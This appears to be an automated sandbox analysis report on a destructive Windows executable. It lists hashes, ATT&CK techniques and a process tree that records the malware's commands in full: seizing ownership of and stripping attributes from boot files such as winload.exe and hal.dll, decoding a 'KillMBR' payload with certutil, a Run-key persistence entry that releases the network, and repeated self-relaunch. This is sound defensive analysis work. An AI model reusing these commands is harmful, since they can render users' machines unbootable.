5af8fea92236dff382f1c6ec7267fd871ddbd302bb511e169b7162683a6809d3

Analysis

max time kernel
148s
max time network
123s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
20-11-2024 01:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
Size

112KB
MD5

81a7a946456f1f6dae4715b1feb72ed0
SHA1

af83b938017efd53f95671adc0c6d2aa1088d38e
SHA256

690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408
SHA512

a1ec5c6b1ebb014aa60d0242e147ebbbadd2aff2a0e653b99f440f8d25bb01ee49cddcf6ad608c0adc8a5efc784ff2c949036b447da2912ccc6e684c2cc0e692
SSDEEP

3072:O7DhdC6kzWypvaQ0FxyNTBfHdIyEGfvBN+:OBlkZvaF4NTB/yyEGfvBQ

Score

8^/10

defense_evasion discovery evasion exploit upx

Malware Config

Signatures

Modifies Windows Firewall 2 TTPs 5 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exenetsh.exenetsh.exenetsh.exenetsh.exe

pid process

1404 netsh.exe
8176 netsh.exe
6684 netsh.exe
6504 netsh.exe
12760 netsh.exe

pid	process
1404	netsh.exe
8176	netsh.exe
6684	netsh.exe
6504	netsh.exe
12760	netsh.exe

Possible privilege escalation attempt 64 IoCs

exploit

Processes:

icacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exe

pid	process
4000	icacls.exe
6756	icacls.exe
7396	takeown.exe
6080	icacls.exe
4972	icacls.exe
12884	icacls.exe
3132	icacls.exe
4620	takeown.exe
5140	icacls.exe
3748	takeown.exe
7728	takeown.exe
5000	takeown.exe
4176	takeown.exe
6296	takeown.exe
2128	takeown.exe
8052	takeown.exe
7656	icacls.exe
648	takeown.exe
2332	icacls.exe
7504	takeown.exe
7648	takeown.exe
2056	icacls.exe
5524	takeown.exe
7768	icacls.exe
4432	takeown.exe
3812	takeown.exe
3240	takeown.exe
3872	takeown.exe
1416	icacls.exe
7776	icacls.exe
1796	icacls.exe
7656	takeown.exe
2736	takeown.exe
1640	icacls.exe
6080	icacls.exe
4188	icacls.exe
7824	icacls.exe
7652	icacls.exe
6480	icacls.exe
6540	icacls.exe
5140	takeown.exe
3740	takeown.exe
12732	icacls.exe
832	takeown.exe
8060	takeown.exe
8000	icacls.exe
7400	takeown.exe
2456	takeown.exe
11588	takeown.exe
4624	takeown.exe
7828	icacls.exe
3484	icacls.exe
2148	takeown.exe
2644	icacls.exe
3120	icacls.exe
1400	takeown.exe
3812	takeown.exe
2608	icacls.exe
1996	takeown.exe
7664	takeown.exe
7012	takeown.exe
7436	takeown.exe
7300	takeown.exe
8120	takeown.exe

Drops startup file 2 IoCs

Processes:

cmd.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe	cmd.exe

Executes dropped EXE 1 IoCs

Processes:

Tasksvc.exe

pid process

3112 Tasksvc.exe

pid	process
3112	Tasksvc.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

takeown.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exe

pid	process
2148	takeown.exe
3244	icacls.exe
7396	takeown.exe
12884	icacls.exe
9900	takeown.exe
4324	takeown.exe
4600	icacls.exe
5000	takeown.exe
1480	icacls.exe
2456	takeown.exe
7940	takeown.exe
7768	icacls.exe
4972	icacls.exe
2128	takeown.exe
3120	icacls.exe
7436	takeown.exe
6540	icacls.exe
5020	takeown.exe
3872	takeown.exe
7776	icacls.exe
7096	takeown.exe
4404	takeown.exe
4268	takeown.exe
6756	icacls.exe
4188	icacls.exe
832	takeown.exe
4176	takeown.exe
1196	takeown.exe
3812	takeown.exe
7864	icacls.exe
6992	icacls.exe
4732	icacls.exe
1996	takeown.exe
5140	icacls.exe
6096	takeown.exe
1216	takeown.exe
8000	icacls.exe
7400	takeown.exe
5340	icacls.exe
3740	takeown.exe
7728	takeown.exe
3572	takeown.exe
3240	takeown.exe
6124	takeown.exe
8120	takeown.exe
1796	icacls.exe
7656	icacls.exe
2644	icacls.exe
2056	icacls.exe
3484	icacls.exe
3812	takeown.exe
3940	takeown.exe
4928	icacls.exe
6480	icacls.exe
8016	takeown.exe
7664	takeown.exe
1640	icacls.exe
8052	takeown.exe
7716	takeown.exe
3132	icacls.exe
2608	icacls.exe
4020	icacls.exe
11588	takeown.exe
7808	icacls.exe

Deobfuscate/Decode Files or Information 1 TTPs 1 IoCs
Payload decoded via CertUtil.
defense_evasion

Deobfuscate/Decode Files or Information
T1140

Processes:

certutil.exe

pid process

840 certutil.exe
File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001
Modifies boot configuration data using bcdedit 4 IoCs

Processes:

bcdedit.exebcdedit.exebcdedit.exebcdedit.exe

pid process

2868 bcdedit.exe
8116 bcdedit.exe
3312 bcdedit.exe
6992 bcdedit.exe
Drops autorun.inf file 1 TTPs 1 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media
T1091

Processes:

cmd.exe

description ioc process

File opened for modification C:\Users\Admin\AppData\Local\Temp\Autorun.inf cmd.exe

pid	process
840	certutil.exe

pid	process
2868	bcdedit.exe
8116	bcdedit.exe
3312	bcdedit.exe
6992	bcdedit.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	cmd.exe

Drops file in System32 directory 3 IoCs

Processes:

attrib.exeattrib.exeattrib.exe

description	ioc	process
File opened for modification	C:\Windows\System32\winresume.exe	attrib.exe
File opened for modification	C:\Windows\System32\winload.exe	attrib.exe
File opened for modification	C:\Windows\System32\hal.dll	attrib.exe

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Tasksvc.exe	upx
behavioral2/memory/3112-263-0x0000000000400000-0x000000000040E000-memory.dmp	upx
behavioral2/memory/3112-350-0x0000000000400000-0x000000000040E000-memory.dmp	upx

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exeTasksvc.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Tasksvc.exe

Gathers network information 2 TTPs 13 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

Processes:

ipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exe

pid	process
6548	ipconfig.exe
7936	ipconfig.exe
4624	ipconfig.exe
4820	ipconfig.exe
2900	ipconfig.exe
2748	ipconfig.exe
1852	ipconfig.exe
2836	ipconfig.exe
6104	ipconfig.exe
6740	ipconfig.exe
4432	ipconfig.exe
4400	ipconfig.exe
3940	ipconfig.exe

Modifies registry key 1 TTPs 30 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid	process
10700	reg.exe
5340	reg.exe
11400	reg.exe
12248	reg.exe
4404	reg.exe
4188	reg.exe
4452	reg.exe
7480	reg.exe
6252	reg.exe
7880	reg.exe
10384	reg.exe
860	reg.exe
10832	reg.exe
1664	reg.exe
4560	reg.exe
3332	reg.exe
7976	reg.exe
1844	reg.exe
8052	reg.exe
3704	reg.exe
7428	reg.exe
6940	reg.exe
4856	reg.exe
6008	reg.exe
7736	reg.exe
7524	reg.exe
12656	reg.exe
7680	reg.exe
10272	reg.exe
10880	reg.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

takeown.exetakeown.exetakeown.exetakeown.exe

description	pid	process
Token: SeTakeOwnershipPrivilege	1216	takeown.exe
Token: SeTakeOwnershipPrivilege	5020	takeown.exe
Token: SeTakeOwnershipPrivilege	4324	takeown.exe
Token: SeTakeOwnershipPrivilege	5000	takeown.exe

Suspicious use of WriteProcessMemory 33 IoCs

Processes:

690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.execmd.execmd.exe

description	pid	process	target process
PID 1192 wrote to memory of 4904	1192	690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe	cmd.exe
PID 1192 wrote to memory of 4904	1192	690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe	cmd.exe
PID 4904 wrote to memory of 1548	4904	cmd.exe	cmd.exe
PID 4904 wrote to memory of 1548	4904	cmd.exe	cmd.exe
PID 4904 wrote to memory of 1216	4904	cmd.exe	takeown.exe
PID 4904 wrote to memory of 1216	4904	cmd.exe	takeown.exe
PID 4904 wrote to memory of 2468	4904	cmd.exe	icacls.exe
PID 4904 wrote to memory of 2468	4904	cmd.exe	icacls.exe
PID 4904 wrote to memory of 2728	4904	cmd.exe	attrib.exe
PID 4904 wrote to memory of 2728	4904	cmd.exe	attrib.exe
PID 1548 wrote to memory of 4324	1548	cmd.exe	takeown.exe
PID 1548 wrote to memory of 4324	1548	cmd.exe	takeown.exe
PID 4904 wrote to memory of 5020	4904	cmd.exe	takeown.exe
PID 4904 wrote to memory of 5020	4904	cmd.exe	takeown.exe
PID 4904 wrote to memory of 4600	4904	cmd.exe	icacls.exe
PID 4904 wrote to memory of 4600	4904	cmd.exe	icacls.exe
PID 4904 wrote to memory of 1812	4904	cmd.exe	attrib.exe
PID 4904 wrote to memory of 1812	4904	cmd.exe	attrib.exe
PID 4904 wrote to memory of 5000	4904	cmd.exe	takeown.exe
PID 4904 wrote to memory of 5000	4904	cmd.exe	takeown.exe
PID 4904 wrote to memory of 4188	4904	cmd.exe	icacls.exe
PID 4904 wrote to memory of 4188	4904	cmd.exe	icacls.exe
PID 4904 wrote to memory of 2064	4904	cmd.exe	cmd.exe
PID 4904 wrote to memory of 2064	4904	cmd.exe	cmd.exe
PID 4904 wrote to memory of 840	4904	cmd.exe	certutil.exe
PID 4904 wrote to memory of 840	4904	cmd.exe	certutil.exe
PID 4904 wrote to memory of 3112	4904	cmd.exe	Tasksvc.exe
PID 4904 wrote to memory of 3112	4904	cmd.exe	Tasksvc.exe
PID 4904 wrote to memory of 3112	4904	cmd.exe	Tasksvc.exe
PID 4904 wrote to memory of 4676	4904	cmd.exe	wscript.exe
PID 4904 wrote to memory of 4676	4904	cmd.exe	wscript.exe
PID 4904 wrote to memory of 964	4904	cmd.exe	Conhost.exe
PID 4904 wrote to memory of 964	4904	cmd.exe	Conhost.exe

Views/modifies file attributes 1 TTPs 55 IoCs

evasion

Hidden Files and Directories

T1564.001

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid	process
2064	attrib.exe
1648	attrib.exe
2056	attrib.exe
1464	attrib.exe
2900	attrib.exe
1480	attrib.exe
7728	attrib.exe
2920	attrib.exe
12620	attrib.exe
1736	attrib.exe
8080	attrib.exe
7096	attrib.exe
2696	attrib.exe
2288	attrib.exe
944	attrib.exe
5284	attrib.exe
2728	attrib.exe
5008	attrib.exe
8080	attrib.exe
4936	attrib.exe
5220	attrib.exe
4624	attrib.exe
4812	attrib.exe
3244	attrib.exe
4732	attrib.exe
3560	attrib.exe
6548	attrib.exe
2796	attrib.exe
8240	attrib.exe
7164	attrib.exe
8708	attrib.exe
2644	attrib.exe
7120	attrib.exe
896	attrib.exe
4432	attrib.exe
3916	attrib.exe
8052	attrib.exe
6548	attrib.exe
1812	attrib.exe
8148	attrib.exe
7976	attrib.exe
6504	attrib.exe
5140	attrib.exe
4952	attrib.exe
5156	attrib.exe
7716	attrib.exe
7640	attrib.exe
1984	attrib.exe
9156	attrib.exe
4580	attrib.exe
1092	attrib.exe
7808	attrib.exe
7524	attrib.exe
2900	attrib.exe
8272	attrib.exe

C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
"C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1192
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B14E.tmp\B14F.tmp\B160.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
  2⤵
  - Drops startup file
  - Drops autorun.inf file
  - Suspicious use of WriteProcessMemory
  PID:4904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K Taskdl.bat
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1548
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32" /r
      4⤵
      Modifies file permissions
      Suspicious use of AdjustPrivilegeToken
      PID:4324
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\winresume.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1216
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\winresume.exe" /reset /c /q
    3⤵
    PID:2468
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
    3⤵
    - Drops file in System32 directory
    - Views/modifies file attributes
    PID:2728
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\winload.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:5020
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\winload.exe" /reset /c /q
    3⤵
    - Modifies file permissions
    PID:4600
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\winload.exe"
    3⤵
    - Drops file in System32 directory
    - Views/modifies file attributes
    PID:1812
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Windows\System32\hal.dll"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:5000
- - C:\Windows\system32\icacls.exe
    icacls "C:\Windows\System32\hal.dll" /reset /c /q
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4188
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h "C:\Windows\System32\hal.dll"
    3⤵
    - Drops file in System32 directory
    - Views/modifies file attributes
    PID:2064
- - C:\Windows\system32\certutil.exe
    certutil -decode "C:\Users\Admin\AppData\Local\Temp\KillMBR.Shingapi.tmp" "Tasksvc.exe"
    3⤵
    - Deobfuscate/Decode Files or Information
    PID:840
- - C:\Users\Admin\AppData\Local\Temp\Tasksvc.exe
    Tasksvc.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3112
- - C:\Windows\system32\wscript.exe
    WScript Informacion.vbs
    3⤵
    PID:4676
- - C:\Windows\system32\rundll32.exe
    rundll32 user32.dll, SetCursorPos
    3⤵
    PID:964
- - C:\Windows\system32\rundll32.exe
    rundll32 user32.dll, SwapMouseButton
    3⤵
    PID:3240
- - C:\Windows\system32\ipconfig.exe
    ipconfig /release
    3⤵
    - Gathers network information
    PID:4400
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
    3⤵
    PID:2652
- - C:\Windows\system32\attrib.exe
    attrib -r -a -s -h *.*
    3⤵
    - Views/modifies file attributes
    PID:4732
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:372
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:1576
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:4832
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:2540
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:4536
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:3820
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:4948
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:1504
- - C:\Windows\system32\wscript.exe
    WScript ErrorCritico.vbs
    3⤵
    PID:1600
- - C:\Windows\system32\wscript.exe
    WScript Advertencia.vbs
    3⤵
    PID:3964
- - C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
    C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
    3⤵
    PID:396
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B9F9.tmp\B9FA.tmp\B9FB.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
      4⤵
      PID:2064
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        5⤵
        
        PID:2524
      - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        6⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3240
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2148
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        5⤵
        Modifies file permissions
        
        PID:4732
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        5⤵
        Views/modifies file attributes
        
        PID:5008
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        5⤵
        
        PID:944
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2608
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        5⤵
        Views/modifies file attributes
        
        PID:4580
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        5⤵
        Possible privilege escalation attempt
        
        PID:1400
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        5⤵
        Modifies file permissions
        
        PID:4020
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        5⤵
        Views/modifies file attributes
        
        PID:2644
    - - C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        5⤵
        
        PID:4808
    - - C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        5⤵
        
        PID:3932
    - - C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        5⤵
        
        PID:1800
    - - C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        5⤵
        Gathers network information
        
        PID:2836
    - - C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        5⤵
        
        PID:1996
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        5⤵
        Views/modifies file attributes
        
        PID:1092
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:4964
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:3940
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:3000
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:1376
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:5172
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:5240
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:5300
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:5352
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:5416
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:5480
    - - C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        5⤵
        
        PID:5528
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\1807.tmp\1808.tmp\1809.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        6⤵
        
        PID:5656
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:7112
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        Modifies file permissions
        
        PID:7940
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:7436
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:7776
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        Views/modifies file attributes
        
        PID:8148
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        Possible privilege escalation attempt
        
        PID:8060
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        
        PID:2332
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        Views/modifies file attributes
        
        PID:7120
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        
        PID:7832
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2056
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        Views/modifies file attributes
        
        PID:7728
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:7572
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:6108
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        7⤵
        
        PID:896
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:6548
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        7⤵
        
        PID:4936
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        Views/modifies file attributes
        
        PID:2696
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:8944
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:9040
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:9212
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:8312
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:8980
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:3944
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:9120
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:9252
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:9380
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:9532
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        7⤵
        
        PID:9996
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\4ACB.tmp\4ACC.tmp\4ACD.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        8⤵
        
        PID:916
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:10212
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:9988
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:10076
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:7296
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        7⤵
        
        PID:10944
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\7A85.tmp\7A86.tmp\7A87.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        8⤵
        
        PID:8920
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:11216
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:7552
        
        C:\Windows\system32\calc.exe
        
        calc
